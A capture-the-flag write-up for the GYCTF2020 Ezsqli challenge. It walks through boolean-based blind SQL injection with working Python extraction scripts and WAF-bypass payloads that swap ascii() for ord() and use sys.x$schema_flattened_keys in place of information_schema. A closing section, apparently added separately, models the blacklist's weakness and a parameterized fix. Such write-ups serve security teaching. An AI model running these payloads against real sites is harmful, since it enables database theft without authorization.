[GYCTF2020]Ezsqli

4 months ago

With id=1 the page returns:

Nu1L

With id=2 it returns:

V&N

With id=0 (a row that does not exist) it returns:

Error Occured When Fetch Result.

When the WAF is triggered it returns:

SQL Injection Checked.

Submitting if(0,1,2): 0 is false, so the expression evaluates to 2, the query behaves like id=2, and the page prints V&N.

Submitting if(1,1,2): 1 is true, so the expression evaluates to 1, the query behaves like id=1, and the page prints Nu1L.

The id value is therefore evaluated as part of the query, and MySQL's if() turns the page into a boolean oracle: a true condition shows Nu1L, a false one shows V&N. Test the length of the current database name; when it equals 21 the page returns Nu1L, which proves the condition is true:

if((length(database()))=21,1,2)

The combination “if(ord” is filtered, so replace ord() with ascii():

import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Probe: if((ascii(substr(database(),i,1))=j),1,2)
# true -> behaves like id=1 (page shows Nu1L), false -> like id=2 (V&N)
payload1 = "if((ascii(substr(database(),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1, 22):          # the database name is 21 characters long
    for j in range(23, 123):    # printable ASCII range
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        data = {'id': payload}
        s = requests.post(url, data=data).text
        if "Nu1L" in s:         # condition true: character i is chr(j)
            name += chr(j)
            print(name)
            break

The database name is give_grandpa_pa_pa_pa. Next, enumerate the table names. information_schema is filtered; after some searching, sys.x$schema_flattened_keys (a view in the MySQL sys schema that also exposes table_schema and table_name, although only for tables that have an index) can be used instead.

Check the combined length of the table names; when it equals 39 the page returns Nu1L, which proves the condition is true:

if((select(length(group_concat(TABLE_NAME)))from(sys.x$schema_flattened_keys)where(table_schema=database()))=39,1,2)

Enumerate the tables:

import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Same boolean probe as before, but over the comma-joined table names taken
# from sys.x$schema_flattened_keys instead of the filtered information_schema
payload1 = "if((ascii(substr((select(group_concat(TABLE_NAME))from(sys.x$schema_flattened_keys)where(table_schema=database())),"
payload2 = ",1))="
payload3 = "),1,2)"
name = ""
for i in range(1, 40):          # group_concat result is 39 characters long
    for j in range(23, 123):    # printable ASCII range
        payload = payload1 + str(i) + payload2 + str(j) + payload3
        data = {'id': payload}
        s = requests.post(url, data=data).text
        if "Nu1L" in s:         # condition true: character i is chr(j)
            name += chr(j)
            print(name)
            break

This yields two table names: f1ag_1s_h3r3_hhhhh and users233333333333333.

Normally the next step is to enumerate the column names, but since information_schema is filtered I was lazy and simply guessed that the flag sits in a column named flag. I adjusted the length slightly and, to make it faster, switched to a smaller character dictionary.

import requests

url = "http://2070e1dc-ce1b-4d1c-ae33-f747d0ae05e8.node3.buuoj.cn/index.php"
# Guessed column: flag in table f1ag_1s_h3r3_hhhhh (column names were not enumerated)
payload1 = "if(ascii(substr((select(flag)from(f1ag_1s_h3r3_hhhhh)),"
payload2 = ",1))="
payload3 = ",1,2)"
name = ""
# Smaller dictionary than the full ASCII range, to speed things up
dic = "qwertyuioplkjhgfdsazxcvbnmQAZWSXEDCRFVTGBYHNUJMIKOLP1234567890-{}"
for i in range(1, 50):
    for j in dic:
        payload = payload1 + str(i) + payload2 + str(ord(j)) + payload3
        data = {'id': payload}
        s = requests.post(url, data=data).text
        if "Nu1L" in s:         # condition true: character i is j
            name += j
            print(name)
            break
    else:
        break                   # nothing matched at position i: end of the value
    if name.endswith("}"):
        break                   # closing brace of the flag reached
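As an added illustration (not code from the writeup), the following Python models the two sides of this challenge from the defender's seat: a substring blacklist of the kind the WAF appears to use lets the ord()-to-ascii() and information_schema-to-sys.x$schema_flattened_keys substitutions straight through, whereas treating id as what it is, a small integer, and binding it as a query parameter rejects every probe on this page. The BLACKLIST tuple, the probe strings and the in-memory table rows are constructed assumptions.

```python
import re
import sqlite3

# Substring blacklist modelled on the WAF behaviour the writeup describes:
# "if(ord" and "information_schema" are blocked, everything else passes.
BLACKLIST = ("if(ord", "information_schema")

# Constructed probes (assumed, not copied from the writeup) in the shapes it uses:
# a true condition makes the query behave like id=1, a false one like id=2.
PROBES = {
    "ord_probe": "if(ord(substr(database(),1,1))=103,1,2)",      # blocked by the WAF
    "ascii_probe": "if(ascii(substr(database(),1,1))=103,1,2)",  # slips through
    "sys_probe": "if((select(length(group_concat(TABLE_NAME)))"
                 "from(sys.x$schema_flattened_keys)"
                 "where(table_schema=database()))=39,1,2)",     # slips through
}

def blacklist_waf_blocks(value: str) -> bool:
    """Blacklist WAF: reject only if a blacklisted substring appears."""
    low = value.lower()
    return any(bad in low for bad in BLACKLIST)

ID_RE = re.compile(r"[0-9]{1,10}")

def allowlist_accepts(value: str) -> bool:
    """Allow-list: id is a row number, so only a short digit string is valid."""
    return ID_RE.fullmatch(value) is not None

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge table (rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "Nu1L"), (2, "V&N")])
    return conn

def handle_request(conn: sqlite3.Connection, raw_id: str) -> str:
    """Hardened handler: validate, then bind the value; never splice it into SQL."""
    if not allowlist_accepts(raw_id):
        return "Rejected: id must be a positive integer."
    row = conn.execute("SELECT name FROM users WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else "Error Occured When Fetch Result."

if __name__ == "__main__":
    for label, probe in PROBES.items():
        print(f"{label}: blacklist blocks={blacklist_waf_blocks(probe)}, "
              f"allowlist accepts={allowlist_accepts(probe)}")
    db = make_db()
    for value in ("1", "2", "0", PROBES["ascii_probe"]):
        print(repr(value[:30]), "->", handle_request(db, value))
```

Only the ord_probe is stopped by the blacklist; the allow-list plus parameter binding rejects all three while still serving ids 1, 2 and the non-existent 0 exactly as the challenge does.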
Shaw Root
Tags: buuctf, SQL injection